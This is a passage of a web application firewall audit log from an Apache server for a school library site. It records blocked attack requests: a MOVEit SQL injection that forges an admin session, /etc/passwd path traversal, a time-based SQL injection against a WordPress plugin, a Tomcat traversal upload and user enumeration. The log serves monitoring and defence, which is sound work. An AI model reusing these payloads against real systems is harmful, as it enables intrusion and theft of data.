"ARGS_NAMES:x\x5cx9c\x5cv\x5cxf0ff\x5cxe1b\x5cx00\x5cx81\x5cx9c\x5cx8a\x5cxbc\x5cxf0\x22AQ\x5cx0fN \x5cx1b\x5cx84\x5cx85\x5cx18d\x5cx18\x5cx9c\x5cxc3\x5c\x5cu\x5cx8d\x5cx0c\x5cx8c\x5cx8cuM\x5cxcc\x5cx8dL\x5cxcc\x5cxf4J*JBC8\x5cx19\x5cx98\x5cx1f\x5cxdb\x5cx05\x5cxa7\x5cx9ec\x5cxf3K-\x5cxad\x5cxe0f`d\x5cxf9\x5cxca\x5cxc8\x5cxc0\x5cxc0\x5cx022\x5cx01\x5cxa8:>\x5cxc458\x5cx84 \x5cxc0\x5cx9b\x5cx91I\x5cx8e\x5cx19\x5cx97\x5cxb1\x5cx12`q\x5cxa0=x\x9c\x0b\xf0ff\xe1b\x00\x81\x9c Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748496968086320 3539 (- - -) Stopwatch2: 1748496968086320 3539; combined=2229, p1=376, p2=1825, p3=0, p4=0, p5=28, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3a79a28-Z-- --c26ca62a-A-- [29/May/2025:12:41:44 +0700] aDfzmGMaQtTb69S13pj8WwAAAEM 103.236.140.4 60852 103.236.140.4 8181 --c26ca62a-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15 Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyUsername: Guest X-siLock-SessVar1: MyPkgAccessCode: 123 X-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62 Cookie: siLockLongTermInstID=0; SenayanMember=kcjohcup599bat2nh0jm8n37n1 X-Varnish: 169378682 --c26ca62a-C-- --c26ca62a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c26ca62a-E-- --c26ca62a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748497304408147 3047 (- - -) Stopwatch2: 1748497304408147 3047; combined=1507, p1=421, p2=1055, p3=0, p4=0, p5=30, sr=72, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c26ca62a-Z-- --910c2557-A-- [29/May/2025:12:41:55 +0700] aDfzo8X5pbyFXv2T3iphtwAAAMs 103.236.140.4 60866 103.236.140.4 8181 --910c2557-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 0 User-Agent: python-requests/2.26.0 Accept: */* Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyPkgID: 0 X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('2xjRiLJcsWiGWNHgy7ScqF2Ou42');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET InstId='1234' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET IpAddress='206.82.6.62' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET Timeout='60' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET ResilNode='10' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET AcctReady='1' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42'; -- asdf X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62 Cookie: siLockLongTermInstID=0; SenayanMember=kcjohcup599bat2nh0jm8n37n1 X-Varnish: 169378688 --910c2557-C-- --910c2557-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --910c2557-E-- --910c2557-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748497315414863 3167 (- - -) Stopwatch2: 1748497315414863 3167; combined=1571, p1=461, p2=1080, p3=0, p4=0, p5=30, sr=87, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --910c2557-Z-- --b2155e1b-A-- [29/May/2025:12:44:59 +0700] aDf0W31Ye2lUDKzW1LvObQAAAAo 103.236.140.4 60934 103.236.140.4 8181 --b2155e1b-B-- GET /?umbrella-restore=1&filename=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 169378694 --b2155e1b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b2155e1b-E-- --b2155e1b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?umbrella-restore=1&filename=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748497499099382 1730 (- - -) Stopwatch2: 1748497499099382 1730; combined=502, p1=355, p2=118, p3=0, p4=0, p5=28, sr=75, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2155e1b-Z-- --66fe3563-A-- [29/May/2025:13:13:48 +0700] aDf7HH1Ye2lUDKzW1LvPWQAAAAY 103.236.140.4 33702 103.236.140.4 8181 --66fe3563-B-- GET /?umbrella-restore=1&filename=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165250969 --66fe3563-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --66fe3563-E-- --66fe3563-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?umbrella-restore=1&filename=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748499228787952 1652 (- - -) Stopwatch2: 1748499228787952 1652; combined=508, p1=358, p2=123, p3=0, p4=0, p5=27, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66fe3563-Z-- --052e590d-A-- [29/May/2025:13:56:14 +0700] aDgFDv4vV4CoZ0MKLMPmNwAAAJE 103.236.140.4 34384 103.236.140.4 8181 --052e590d-B-- GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165251052 --052e590d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --052e590d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748501774072928 2026 (- - -) Stopwatch2: 1748501774072928 2026; combined=832, p1=383, p2=420, p3=0, p4=0, p5=28, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --052e590d-Z-- --fb476d22-A-- [29/May/2025:13:56:14 +0700] aDgFDmMaQtTb69S13pj86gAAAFA 103.236.140.4 34396 103.236.140.4 8181 --fb476d22-B-- POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 84 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 165251058 --fb476d22-C-- q=SELECT IF(1=1,sleep(15),sleep(0));&auth=%00&integ=512f993fd8e9d08f42e736f28675ed6f --fb476d22-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb476d22-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:auth outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:auth=\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748501774987403 2684 (- - -) Stopwatch2: 1748501774987403 2684; combined=1489, p1=367, p2=1095, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb476d22-Z-- --ba174e1e-A-- [29/May/2025:14:22:34 +0700] aDgLOmMaQtTb69S13pj9JAAAAFU 103.236.140.4 35082 103.236.140.4 8181 --ba174e1e-B-- POST /userentry?accountId=/../../../tomcat/webapps/UsTFY/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 124 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 165251173 --ba174e1e-C-- xœ ðffábœŠ¼ð"AQN „…dœÃ\u ŒŒuMÌLÌôJ*JBC8˜Û§žcóK-­àf`dùÊÈÀÀ2¨:>Ä58„+À›‘IŽ—±`q &†-Pm–°B,A³ À›• ¢—‘!H‡‚M ?Ë --ba174e1e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba174e1e-E-- --ba174e1e-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS_NAMES:x\x9c\v\xf0ff\xe1b\x00\x81\x9c\x8a\xbc\xf0"AQ\x0fN \x1b\x84\x85\x18d\x18\x9c\xc3\\u\x8d\x0c\x8c\x8cuM\xcc\x8dL\xcc\xf4J*JBC8\x19\x98\x1f\xdb\x05\xa7\x9ec\xf3K-\xad\xe0f`d\xf9\xca\xc8\xc0\xc0\x022\x01\xa8:>\xc458\x84 \xc0\x9b\x91I\x8e\x19\x97\xb1\x12`q\xa0 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS_NAMES:x\x5cx9c\x5cv\x5cxf0ff\x5cxe1b\x5cx00\x5cx81\x5cx9c\x5cx8a\x5cxbc\x5cxf0\x22AQ\x5cx0fN \x5cx1b\x5cx84\x5cx85\x5cx18d\x5cx18\x5cx9c\x5cxc3\x5c\x5cu\x5cx8d\x5cx0c\x5cx8c\x5cx8cuM\x5cxcc\x5cx8dL\x5cxcc\x5cxf4J*JBC8\x5cx19\x5cx98\x5cx1f\x5cxdb\x5cx05\x5cxa7\x5cx9ec\x5cxf3K-\x5cxad\x5cxe0f`d\x5cxf9\x5cxca\x5cxc8\x5cxc0\x5cxc0\x5cx022\x5cx01\x5cxa8:>\x5cxc458\x5cx84 \x5cxc0\x5cx9b\x5cx91I\x5cx8e\x5cx19\x5cx97\x5cxb1\x5cx12`q\x5cxa0=x\x9c\x0b\xf0ff\xe1b\x00\x81\x9c Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748503354784591 4660 (- - -) Stopwatch2: 1748503354784591 4660; combined=2660, p1=548, p2=2078, p3=0, p4=0, p5=34, sr=83, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba174e1e-Z-- --aaff8213-A-- [29/May/2025:14:22:51 +0700] aDgLS2MaQtTb69S13pj9KQAAAEc 103.236.140.4 35092 103.236.140.4 8181 --aaff8213-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/121.0 Safari/537.36 Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyUsername: Guest X-siLock-SessVar1: MyPkgAccessCode: 123 X-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: siLockLongTermInstID=0; SenayanMember=t10rqfl119b1qko2isb7q1l8j1 X-Varnish: 165251176 --aaff8213-C-- --aaff8213-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aaff8213-E-- --aaff8213-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748503371804356 3302 (- - -) Stopwatch2: 1748503371804356 3302; combined=1620, p1=437, p2=1154, p3=0, p4=0, p5=28, sr=70, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aaff8213-Z-- --59ff8458-A-- [29/May/2025:14:23:04 +0700] aDgLWGMaQtTb69S13pj9LQAAAEg 103.236.140.4 35112 103.236.140.4 8181 --59ff8458-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: python-requests/2.26.0 Accept: */* Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyPkgID: 0 X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('2xjRiLJcsWiGWNHgy7ScqF2Ou42');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET InstId='1234' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET IpAddress='206.82.6.62' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET Timeout='60' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET ResilNode='10' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42';UPDATE activesessions SET AcctReady='1' WHERE SessionID='2xjRiLJcsWiGWNHgy7ScqF2Ou42'; -- asdf X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62 Cookie: siLockLongTermInstID=0; SenayanMember=t10rqfl119b1qko2isb7q1l8j1 X-Varnish: 154632602 --59ff8458-C-- --59ff8458-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59ff8458-E-- --59ff8458-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748503384787100 3112 (- - -) Stopwatch2: 1748503384787100 3112; combined=1530, p1=459, p2=1041, p3=0, p4=0, p5=29, sr=83, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59ff8458-Z-- --02cbf668-A-- [29/May/2025:14:24:05 +0700] aDgLlWMaQtTb69S13pj9NgAAAFU 103.236.140.4 35132 103.236.140.4 8181 --02cbf668-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.230.172.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.230.172.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --02cbf668-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02cbf668-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748503445478105 2531 (- - -) Stopwatch2: 1748503445478105 2531; combined=1167, p1=418, p2=719, p3=0, p4=0, p5=29, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02cbf668-Z-- --4b3a635b-A-- [29/May/2025:14:25:02 +0700] aDgLzf4vV4CoZ0MKLMPmYQAAAI8 103.236.140.4 35152 103.236.140.4 8181 --4b3a635b-B-- GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/127.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 154632608 --4b3a635b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4b3a635b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748503501998018 2536 (- - -) Stopwatch2: 1748503501998018 2536; combined=924, p1=458, p2=389, p3=0, p4=0, p5=77, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b3a635b-Z-- --a6c3150d-A-- [29/May/2025:14:25:10 +0700] aDgL1sX5pbyFXv2T3ipiNAAAANY 103.236.140.4 35196 103.236.140.4 8181 --a6c3150d-B-- POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 84 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Mobile/15E148 Safari/604.1 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 154632626 --a6c3150d-C-- q=SELECT IF(1=1,sleep(15),sleep(0));&auth=%00&integ=512f993fd8e9d08f42e736f28675ed6f --a6c3150d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6c3150d-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:auth outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:auth=\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748503510066768 2736 (- - -) Stopwatch2: 1748503510066768 2736; combined=1506, p1=384, p2=1093, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6c3150d-Z-- --b3cbb421-A-- [29/May/2025:14:38:54 +0700] aDgPDv4vV4CoZ0MKLMPmjwAAAIk 103.236.140.4 35574 103.236.140.4 8181 --b3cbb421-B-- POST /WSStatusEvents/EventHandler.asmx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id 